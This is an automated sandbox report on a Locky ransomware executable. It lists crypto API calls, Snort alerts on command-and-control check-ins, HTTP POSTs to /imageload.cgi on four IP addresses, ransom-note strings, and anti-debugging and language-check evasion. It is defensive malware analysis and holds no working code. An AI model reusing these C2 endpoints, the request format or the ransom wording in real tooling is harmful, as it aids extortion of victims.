Source: LockyRansom.exe |
ReversingLabs: Detection: 95% |
Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 99.9% probability |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00415310 GetLastError,__CxxThrowException@8,CryptAcquireContextA, |
0_2_00415310 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, |
0_2_00415410 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00416170 CryptReleaseContext,CryptDestroyKey, |
0_2_00416170 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004193D8 CryptReleaseContext, |
0_2_004193D8 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, |
0_2_0041544C |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040F8D0 CryptReleaseContext, |
0_2_0040F8D0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040F890 CryptReleaseContext, |
0_2_0040F890 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040F8B8 CryptReleaseContext, |
0_2_0040F8B8 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040F980 CryptGenRandom,__CxxThrowException@8,GetLastError, |
0_2_0040F980 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040FB50 CryptDestroyKey, |
0_2_0040FB50 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040FB10 CryptDestroyKey, |
0_2_0040FB10 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040FBF0 __CxxThrowException@8,CryptEncrypt,GetLastError, |
0_2_0040FBF0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack |
Source: LockyRansom.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE |
Source: LockyRansom.exe |
Binary string: gefas.pdb |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0042D5D0 FindClose,FindFirstFileW, |
0_2_0042D5D0 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49704 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49704 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49704 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49705 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49705 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49705 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49706 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49706 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49706 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49708 -> 46.183.165.45:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49708 -> 46.183.165.45:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49708 -> 46.183.165.45:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49709 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49709 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49709 -> 185.179.190.31:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49710 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49710 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49710 -> 37.143.9.154:80 |
Source: Traffic |
Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49711 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49711 -> 46.17.44.153:80 |
Source: Traffic |
Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49711 -> 46.17.44.153:80 |
Source: Joe Sandbox View |
ASN Name: ASBAXETRU |
Source: Joe Sandbox View |
ASN Name: AS-REGRU |
Source: Joe Sandbox View |
ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU |
Source: Joe Sandbox View |
ASN Name: WEBHOST1-ASRU |
Source: global traffic |
HTTP traffic detected:
POST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://185.179.190.31/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.179.190.31
Content-Length: 613
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected:
POST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://37.143.9.154/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 37.143.9.154
Content-Length: 613
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected:
POST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://46.17.44.153/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 46.17.44.153
Content-Length: 613
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected:
POST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://46.183.165.45/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 46.183.165.45
Content-Length: 613
Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.179.190.31 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 37.143.9.154 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.17.44.153 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.183.165.45 |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.179.190.31/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.179.190.31/imageload.cgin |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.179.190.31/imageload.cgir |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imag= |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgiC |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgiP |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgid |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgii |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgilh |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://37.143.9.154/imageload.cgiy |
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153 |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/ |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgi0 |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgi0.31/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgiL |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgiP |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgiV |
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgii |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgik |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.153/imageload.cgiy3 |
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.17.44.1531oad.cgi%880 |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.183.165.45/ |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.183.165.45/imageload.cgi |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://46.183.165.45/imageload.cgia-deddda976288 |
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://www.torproject.org/download/download-easy.html |
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: All of your files are encrypted with RSA-2048 and AES-128 ciphers. |
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server. |
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: To receive your private key follow one of the links: |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004022D0 |
0_2_004022D0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040A58C |
0_2_0040A58C |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004029C0 |
0_2_004029C0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040B2C4 |
0_2_0040B2C4 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040940E |
0_2_0040940E |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040995F |
0_2_0040995F |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00409EB0 |
0_2_00409EB0 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: String function: 004182C0 appears 33 times |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: String function: 004761A0 appears 36 times |
Source: classification engine |
Classification label: mal96.rans.evad.winEXE@1/0@0/4 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0040CC4E CoCreateInstance, |
0_2_0040CC4E |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: cryptdll.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: rsaenh.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: mciwave.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: winmm.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: gfiwave.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: mpr.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: wininet.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: netapi32.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: dsrole.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: urlmon.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: iertutil.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: srvcli.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: netutils.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: ntmarta.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: ondemandconnroutehelper.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: winhttp.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: iphlpapi.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Section loaded: winnsi.dll |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 |
Source: LockyRansom.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack .text:ER;.rdata:EW;.dec:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;.cdata:R; |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
0_2_004079B0 |
Source: LockyRansom.exe |
Static PE information: section name: .dec |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00404705 push ecx; ret |
0_2_00404718 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004029AB push ecx; ret |
0_2_004029BB |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00401408 push eax; ret |
0_2_00401426 |
Source: LockyRansom.exe |
Static PE information: section name: .rdata entropy: 7.910838175775477 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Evasive API call chain: GetUserDefaultLangID, ExitProcess |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess |
Source: C:\Users\user\Desktop\LockyRansom.exe |
API coverage: 7.7 % |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Users\user\Desktop\LockyRansom.exe |
API call chain: ExitProcess graph end node |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00405393 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_005C007E push dword ptr fs:[00000030h] |
0_2_005C007E |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_005C03EE push dword ptr fs:[00000030h] |
0_2_005C03EE |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0069007E push dword ptr fs:[00000030h] |
0_2_0069007E |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_006903EE push dword ptr fs:[00000030h] |
0_2_006903EE |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00403A6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00403A6C |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00405F08 SetUnhandledExceptionFilter, |
0_2_00405F08 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0041973D SetSecurityDescriptorDacl, |
0_2_0041973D |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_004197BD AllocateAndInitializeSid, |
0_2_004197BD |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_0042E700 GetLocaleInfoA,GetUserDefaultUILanguage, |
0_2_0042E700 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00406718 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, |
0_2_00406718 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Code function: 0_2_00423053 GetVersionExA, |
0_2_00423053 |
Source: C:\Users\user\Desktop\LockyRansom.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |